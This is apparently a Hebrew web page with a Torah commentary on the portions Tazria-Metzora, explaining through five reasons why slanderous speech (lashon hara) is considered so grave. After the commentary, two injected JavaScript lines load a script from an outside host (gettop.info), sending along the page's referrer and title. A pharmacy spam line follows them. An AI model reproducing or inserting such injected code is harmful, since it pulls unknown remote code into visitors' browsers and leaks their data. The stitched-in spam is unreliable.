מה כל כך חמור בדיבור לשון הרע ? / מרדכי אפרתי

לשון הרע לא מדבר אלי
הנושא המשותף לשתי הפרשיות “תזריע מצורע” שנקרא בע”ה השבת הוא האדם “המצורע” והטיפול בצרעת ותהליך טהרת המצורע.
חז”ל הבינו שה “מצורע” הוא אדם ש “מוציא – רע” דהיינו מדבר “לשון הרע” ועונשו הוא ללקות בצרעת שהיא מחלה קשה מאוד שעל הלוקה בה לחיות לבד ובמנותק מכל אדם.
מדוע העונש על “לשון הרע” הוא כל כך קשה וחמור ?
ראשית אפשר לומר שדיבור “לשון הרע” הוא חמור ביותר כיוון שהוא יכול להתגלגל לרצח ולשפיכות דמים כנקמה על הדיבור הרע. דואג האדומי דיבר “לשון הרע” על כוהני נוב והדבר גרם לשפיכות דמם של כל תושבי נוב עיר הכהנים.
שנית, כל מאות שנות העבדות ועבודת הפרך של אבותינו במצרים נגרמו ע”י כך שיוסף דיבר “לשון הרע” על אחיו והביא את דיבתם הרעה לאביו בזאת שאמר שאחיו בני לאה קוראים לבני השפחות (זילפה ובלהה) בכינוי שם של עבדים דבר שגלגל מידה כנגד מידה את מכירתו לעבד וירידת כל עם ישראל למצרים.
שלישית, חטא המרגלים היה למעשה “לשון הרע” ודיבה רעה על ארץ ישראל ובגללו כ כל אותו דור (פרט לבודדים) מתו במדבר ולא ניכנסו לארץ .
רביעית, דיבור “לשון הרע” מעורר את אותה פעולה מבחינה רוחנית והיא – קטרוג על עם ישראל. הנחת היסוד של גישה זאת אומרת שכל פעולה הנעשית ע”י האדם גורמת לתהליך רוחני שמימי מקביל וזהה. אם אתה נותן צדקה לעני הרי שנתת לו חיים ולכן הכוח הרוחני שמזרים את החיים גם הוא משפיע חיים בזמן שאתה נותן צדקה ולכן “צדקה תציל ממות” . כך גם האדם המדבר “לשון הרע” מעורר את המקטרג העליון לדבר “לשון הרע” על כלל ישראל דבר היכול להביא לאסונות ופורענויות.
חמישית, כידוע האדם מורכב מגוף גשמי ומנשמה אלוקית ורוחנית.
הנשמה, פנימיותו של האדם והצד האלוקי שבו בא לידי ביטוי על ידי הדיבור (חז”ל לומדים זאת מתרגום אונקלוס שתירגם את המילים “ויהי האדם לנפש חיה” – לרוח ממללא – לרוח מדברת ) ולכן הפגם בדיבור הוא הפגם בכוח הכי חשוב והכי אלוקי שיש באדם ומכאן החומרה הרבה של חטא זה. דבר זה מסביר גם את הסיבה לחשיבות הרבה ביותר שחז”ל ייחסו למצוות לימוד תורה כיוון שמצווה זו מתבצעת בעיקר ע”י הדיבור דהיינו ע”י הכח הכי אלוקי שבו ובאמצעותה האדם לוקח את הכח הכי אלוקי וחשוב שלו – הדיבור – ומרומם אותו ומשתמש בו בטוב. s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; viagra generic no pescription

סגור לתגובות.

Scroll To Top